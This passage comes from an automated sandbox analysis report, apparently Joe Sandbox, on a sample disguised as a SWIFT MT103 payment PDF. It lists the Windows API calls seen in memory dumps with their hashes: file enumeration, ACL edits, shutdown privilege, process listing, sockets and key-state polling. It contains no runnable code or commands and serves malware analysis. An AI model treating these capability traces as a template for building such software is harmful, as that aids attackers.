                                                        • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                        • FindClose.KERNEL32(00000000), ref: 00434C88
                                                        • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                        • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                        • FindClose.KERNEL32(00000000), ref: 00434D35
                                                        • FindClose.KERNEL32(00000000), ref: 00434D43
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1409584000-438819550
                                                        • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                        • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                        • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                        • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Timetime$Sleep
                                                        • String ID: BUTTON
                                                        • API String ID: 4176159691-3405671355
                                                        • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                        • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                        • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                        • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,74DE8FB0,74DE8FB0,?,?,00000000), ref: 00442E40
                                                        • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                        • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                        • FindClose.KERNEL32(00000000), ref: 00442F80
                                                          • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                        • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 2640511053-438819550
                                                        • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                        • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                        • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                        • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                        APIs
                                                          • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                          • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                          • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                          • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                        • _memset.LIBCMT ref: 00445E61
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                        • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                        • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                        • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                        • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                        • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                        • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3490752873-0
                                                        • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                        • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                        • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                        • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                        • GetLastError.KERNEL32 ref: 00436504
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 2938487562-3733053543
                                                        • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                        • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                        • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                        • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00436162
                                                        • __swprintf.LIBCMT ref: 00436176
                                                          • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                        • __wcsicoll.LIBCMT ref: 00436185
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                        • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                        • LockResource.KERNEL32(00000000), ref: 004361B5
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                        • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                        • LockResource.KERNEL32(?), ref: 004361FD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                        • String ID:
                                                        • API String ID: 2406429042-0
                                                        • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                        • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                        • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                        • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                        • GetLastError.KERNEL32 ref: 0045D59D
                                                        • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                        • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                        • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                        • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                        APIs
                                                        • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                        • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                        • _wcslen.LIBCMT ref: 0047AE18
                                                        • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                        • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                        • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                        • String ID: HH
                                                        • API String ID: 1915432386-2761332787
                                                        • Opcode ID: a75f31c9213334d6d4c98e1e6ec61e6765e967893df61425839ab1c916c43e70
                                                        • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                        • Opcode Fuzzy Hash: a75f31c9213334d6d4c98e1e6ec61e6765e967893df61425839ab1c916c43e70
                                                        • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DEFINE$`$h$h
                                                        • API String ID: 0-4194577831
                                                        • Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                        • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                        • Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                        • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                        • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                        • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                        • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                        • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketsocket
                                                        • String ID:
                                                        • API String ID: 2609815416-0
                                                        • Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                        • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                        • Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                        • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                        • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                        • __wsplitpath.LIBCMT ref: 004370A5
                                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                        • _wcscat.LIBCMT ref: 004370BA
                                                        • __wcsicoll.LIBCMT ref: 004370C8
                                                        • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID:
                                                        • API String ID: 2547909840-0
                                                        • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                        • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                        • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                        • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                        • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                        • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                        • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                        • String ID: *.*
                                                        • API String ID: 2693929171-438819550
                                                        • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                        • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                        • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                        • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                        APIs
                                                        • __wcsicoll.LIBCMT ref: 0043643C
                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                        • __wcsicoll.LIBCMT ref: 00436466
                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsicollmouse_event
                                                        • String ID: DOWN
                                                        • API String ID: 1033544147-711622031
                                                        • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                        • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                        • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                        • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                        APIs
                                                          • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 4170576061-0
                                                        • Opcode ID: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                        • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                        • Opcode Fuzzy Hash: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                        • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                        APIs
                                                        • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                        • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                        • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                        • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
